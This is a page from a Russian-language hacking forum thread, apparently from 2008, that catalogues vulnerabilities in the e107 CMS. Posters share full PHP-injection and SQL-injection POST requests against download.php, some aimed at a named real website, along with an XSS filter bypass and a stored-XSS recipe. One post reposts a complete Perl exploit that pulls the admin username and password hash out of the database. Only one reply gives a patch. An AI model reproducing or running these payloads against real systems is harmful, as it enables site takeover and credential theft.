ANTICHAT
Страница 2 из 11 < 1 2 3 4 5 6 > Последняя »
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [ Обзор уязвимостей e107 cms ] (https://forum.antichat.xyz/showthread.php?t=50683)

Тр⚡️ха 11.08.2008 19:39
view=1&action=maincats&execute=aWQ=&template_load_ core=echo%20exec
(base64_decode($_POST[execute]));

при таком запросе работать не будет, наверно сделали защиту от скрипткидисов

view=1&action=list&template_load_core=phpinfo();

скуль фигня самое страшно php-injection

PHP код:
$template_load_core ' ..... ';
....
switch ($action)
  {
    case 'list' :
      if (isset($_POST['view'])) extract($_POST);
                    if ($sql->db_Select("download_category""download_category_name,download_category_description,download_category_parent,download_category_class""(download_category_id='{$id}') AND (download_category_class IN (".USERCLASS_LIST."))") )
      { 
...
eval($template_load_core); 
рабочий запрос если в download.php есть хоть одна статья
Код HTML:
POST http://e107 site /download.php?list.1 HTTP/1.0
User-Agent: Opera (Windows NT 5.1; U; si)
Host: www.tarotclub.fr
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
If-None-Match: c858d46e89d4dfb6fcf8add468b46abb
Cookie: e107_tdOffset=7; e107_tdSetTime=1218466444; e107_tzOffset=-240
Cookie2: $Version=1
Proxy-Connection: close

view=1&id=1&template_load_core=phpinfo();
если в download.php нет ниодной статьи и если magic_quotes_gpc OFF можно извратится таким запросом искользуя sql-injection
Код HTML:
POST http://e107 site /download.php?list.1 HTTP/1.0
User-Agent: Opera (Windows NT 5.1; U; si)
Host: www.tarotclub.fr
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
If-None-Match: c858d46e89d4dfb6fcf8add468b46abb
Cookie: e107_tdOffset=7; e107_tdSetTime=1218466444; e107_tzOffset=-240
Cookie2: $Version=1
Proxy-Connection: close

view=1&id=0')/*1*/union/*1*/select/*1*/1,2,3,4/*&template_load_core=phpinfo();
ЗЫ сплойт выкладывать не стал т.к. уже не актуально в e107 апдейт работает хорошо, через пару дней уязвимых сайтов почти не останется, эту багу нашёл 10.07.08

Nightmarе 18.08.2008 23:27
К последним дыркам в download.php есть ли описание как вручную залатать дырки???

Jokester 19.08.2008 19:08
Цитата:
Сообщение от Nightmarе
К последним дыркам в download.php есть ли описание как вручную залатать дырки???
А что, работает?

Я не знаю какую версию смотрели авторы, но у меня на локалке как раз заявленная ими v0.7.11_full

Так вот , всё бы хорошо работало, если-бы там был eval() , но там его нет :D

И кстати. если бы он там был, никакие SQL типа:
Цитата:
id=0')/*1*/union/*1*/select/*1*/1,2,3,4/*
там-бы нужны не были, достаточно просто постом послать (Разумеется download.php?list):
Цитата:
template_load_core=phpinfo();
Я не знаю, может у меня пропатченная, или авторы смотрели старую, был бы благодарен, если-бы кто-то дал CMS с таким кодом посмотреть.

Nightmarе 19.08.2008 20:25
Вот файл:
http://slil.ru/26072120
Это из версии 7.11, с офф сайта качать бесполезно - пропатчили.

Nightmarе 19.08.2008 20:32
Вот файл:
http://slil.ru/26072120
Это из версии 7.11, с офф сайта качать бесполезно - пропатчили.
И там как раз и есть эти строки:
case 'list' : // Category-based listing
if (isset($_POST['view'])) extract($_POST);

Jokester 20.08.2008 00:28
Да, сдесь работает

download.php?list

id=1&template_load_core=phpinfo();

chekist, молодца

Тр⚡️ха 27.08.2008 17:38
в е107 интересные bb коды [flash=50,50]javascript:[xss][/flash],
но есть злобный фильтр
PHP код:
....
if (!preg_match('/&#|\'|"|\(|\)|<|>/s'$text)) 
{
.... 
единственное что получилось использовать location вместо кавычки использовал слеш

ЗЫ у ково получится по интереснее использовать багу отпишытесь

login999 02.09.2008 02:45
e107 Plugin BLOG Engine v2.2 SQL Injection
 
Код:
#!/usr/bin/perl
##############################################################
# e107 Plugin BLOG Engine v2.2  SQL Injection Exploit        #
#              ..::virangar security team::..              #
#                    www.virangar.net                        #
#        C0d3d BY:virangar security team ( hadihadi  )      #
#special tnx to:                                            #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra              #
#& all virangar members & all hackerz                        #
# my lovely friends hadi_aryaie2004 & arash(imm02tal)        #
#            ..:::Young Iranina Hackerz::..                #
##############################################################
 
 
use HTTP::Request;
use LWP::UserAgent;
 
if (@ARGV != 1){
header();
}
$site = $ARGV[0];
 
$attack= "$site"."?uid=-99999%20union%20select%201,concat(0x3c757365723e,user_name,0x3c757365723e,user_password),3%20from%20e107_user%20where%20user_
id=1/*";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$attack));
$res = $req->content;
 
if ($res =~ /<user>(.*?)<user>/){
        print "\n[+] Admin User : $1";}
if ($res =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "\n[+]Done\n";}
 
sub header {
print qq{
###################################################################
# e107 Plugin BLOG Engine v2.2  SQL Injection Exploit            #
#                      www.virangar.net                          #
#  Useage: perl $0 Host                                          #
#                                                                #
#  Host: full patch to macgurublog.php (dont forget http://)    #
#                                                                #
#  Example:                                                      #
# perl $0 http://site/macgurublog_menu/macgurublog.php            #
#                                                                #
###################################################################
};
}
#virangar.net[2008-05-22]

# milw0rm.com [2008-09-01]
Содрано с milw0rm.com/exploits/6346

ZAMUT 04.09.2008 17:39
Active XSS

Версия: 0.7.12

Уязвимый кусок кода:
/usersettings.php
PHP код:
...
$_POST['realname'] = $tp->toDB($_POST['realname']);
...
$sql->db_Update("user""{$new_username} {$pwreset} {$sesschange} user_email='".$tp -> toDB($_POST['email'])."',user_signature='".$_POST['signature']."', user_image='".$tp -> toDB($_POST['image'])."', user_timezone='".$tp -> toDB($_POST['timezone'])."',user_hideemail='".intval($tp -> toDB($_POST['hideemail']))."', user_login='".$_POST['realname']."' {$new_customtitle}, user_xup='".$tp ->
            toDB($_POST['user_xup'])."' WHERE user_id='".intval($inp)."' ");
... 
Эксплоит:
Profile => Click here to update your information => RealName => [Your XSS]

c411k 06.09.2008 20:13
Цитата:
Сообщение от Nightmarе
К последним дыркам в download.php есть ли описание как вручную залатать дырки???
PHP код:
  switch ($action)
  {
    case 'list' :    // Category-based listing
      if (isset($_POST['view'])) extract($_POST); 
PHP код:
 switch ($action)
  {
    case 'list' :    // Category-based listing
      if (isset($_POST['view'])) extract($_POSTEXTR_SKIP); 


Время: 10:31
Страница 2 из 11 < 1 2 3 4 5 6 > Последняя »
Показывать 40 сообщений этой темы на одной странице